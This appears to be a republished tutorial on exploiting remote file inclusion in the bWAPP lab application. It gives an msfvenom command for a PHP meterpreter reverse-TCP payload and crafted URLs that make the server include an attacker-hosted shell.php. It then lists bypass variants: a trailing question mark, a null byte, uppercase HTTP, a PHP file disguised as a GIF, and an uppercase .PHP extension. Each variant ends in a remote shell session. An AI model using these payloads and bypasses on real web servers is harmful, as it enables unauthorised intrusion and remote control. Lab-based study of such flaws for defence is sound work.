Quantcast
Channel: CodeSection,代码区,网络安全 - CodeSec
Viewing all articles
Browse latest Browse all 12749

7 ways to Exploit RFI Vulnerability

0
0

In this article you will learn how to hack any web application server if it is suffering from remote file inclusion vulnerability. I have performed RFI attack using seven different techniques to exploit any web server. Here I have targeted BWAPP which a buggy web application server to perform all these attack.

Remote File Inclusion(also known as RFI) is the process of including remote files through the exploiting of vulnerable inclusion procedures implemented in the application. This vulnerability occurs, for example, when a page receives, as input, the path to the file that has to be included and this input is not properly sanitized, allowing external URL to be injected. Although most examples point to vulnerable php scripts, we should keep in mind that it is also common in other technologies such as JSP, ASP and others.

For more details visit OWASP.org

Let’s Begin!!!

Basic RFI Attack

Open target IPin the browser and login inside BWAPP as bee: bug now choose the bug remote & local file Inclusion then click on hack.


7 ways to Exploit RFI Vulnerability

Here the requested web page which is suffering from RFI & LFI Vulnerability gets open. Where you will find a comment to select a language from the given drop down list, when you click on go button the selected language file get included in URL.


7 ways to Exploit RFI Vulnerability

Now prepare PHP malicious file using msfvenom for attack and start multi handler at the background.

Msfvenom p php/meterpreter/reverse _tcp lhost= 192.168.1.11 lport 4444 f raw

Then copy the highlighted text in a text file.


7 ways to Exploit RFI Vulnerability

If you notice the below screenshot carefully here you will find that I have saved above copied PHP code as shell.php inside /var/www/html, so that shell.php file could be included for RFI attack.


7 ways to Exploit RFI Vulnerability

To perform basic attacks manipulate URL to include php file remotely.

http://192.168.1.113/bWAPP/rlfi.php?language=lang_en.php&action=go into192.168.1.11/bWAPP/flfi.php? language=http://192.168.1.11/shell.php


7 ways to Exploit RFI Vulnerability

As soon as you will execute the URL, you will get reverse connection through meterpreter session.

Meterpreter> sysinfo


7 ways to Exploit RFI Vulnerability
Forced Extension RFI Attack

Repeat the same process and add ‘?’ (Question mark) symbol at the end of URL. Must remember that multi handler should be running at the background of metasploit framework.

http://192.168.1.113/bWAPP/rlfi.php?language=lang_en.php&action=go into192.168.1.11/bWAPP/flfi.php? language=http://192.168.1.11/shell.php?


7 ways to Exploit RFI Vulnerability

Again when you will execute URL, it will give you another meterpreter session.

Meterpreter> sysinfo


7 ways to Exploit RFI Vulnerability
Null Byte RFI Attack

Now to make null byte attack you need to capture the sending request between browser and web server. Here to perform the attack with help of burp suite kindly turn on burp suite then make intercept on and set browser proxy. From given screenshot you can see I have captured the GET request.


7 ways to Exploit RFI Vulnerability

Again if you notice the highlighted text in the given below image you will find that I have edited ‘ %00’ (null character) to make null injection attack. Now before forwarding the GET request make sure your multi handler must be running at the background and then click on forward tab .


7 ways to Exploit RFI Vulnerability

As soon as they GET request will be forward you will get victim’s reverse connection through meterpreter sessions.

Meterpreter> sysinfo


7 ways to Exploit RFI Vulnerability
Change HTTP

The forth technique is similar to the first technique the attacker just need to make very small change in URL and if you notice the following screenshot you will find that I have changed http into HTTP . It might be possible that in some situation when security level get increased small character http get failed to include file remotely.

http://192.168.1.113/bWAPP/rlfi.php?language=lang_en.php&action=go into192.168.1.11/bWAPP/flfi.php? language=HTTP://192.168.1.11/shell.php


7 ways to Exploit RFI Vulnerability

So after making changes now execute the URL and must keep multi handler running at the background which will further provide a new session again through meterpreter.

Meterpreter> sysinfo


7 ways to Exploit RFI Vulnerability
Change Image Extension

In next attack you will find that I had included an image remotely to hack web application server which is not a real image but our php malicious file. So now open your shell.php file and edit GIF98 inside your PHP file as shown in following screenshot and save it as shell.gif at same location i.e. /var/www/html.


7 ways to Exploit RFI Vulnerability

Here again make small change in URL to include malicious image.

http://192.168.1.113/bWAPP/rlfi.php?language=lang_en.php&action=go into192.168.1.11/bWAPP/flfi.php? language=http://192.168.1.11/shell.gif


7 ways to Exploit RFI Vulnerability

Now when again you will execute URL, another meterpreter session gets open for you.

Meterpreter> sysinfo


7 ways to Exploit RFI Vulnerability
Black List RFI Attack

If you have read file uploading article you must be aware of black list where we can inject our file by changing a number of letters to their capital forms to bypass the case sensitive rule, for example PHP or PHP3

You can apply this technique when security level is high, manipulate .php into .PHP; I have renamed shell.php into shell.PHP at same location and then execute shell.PHP with help of URL.

http://192.168.1.113/bWAPP/rlfi.php?language=lang_en.php&action=go into192.168.1.11/bWAPP/flfi.php? language=http://192.168.1.11/shell.PHP


7 ways to Exploit RFI Vulnerability

From following screenshot you can see I have got another session through meterpreter.

Meterpreter> sysinfo


7 ways to Exploit RFI Vulnerability

Viewing all articles
Browse latest Browse all 12749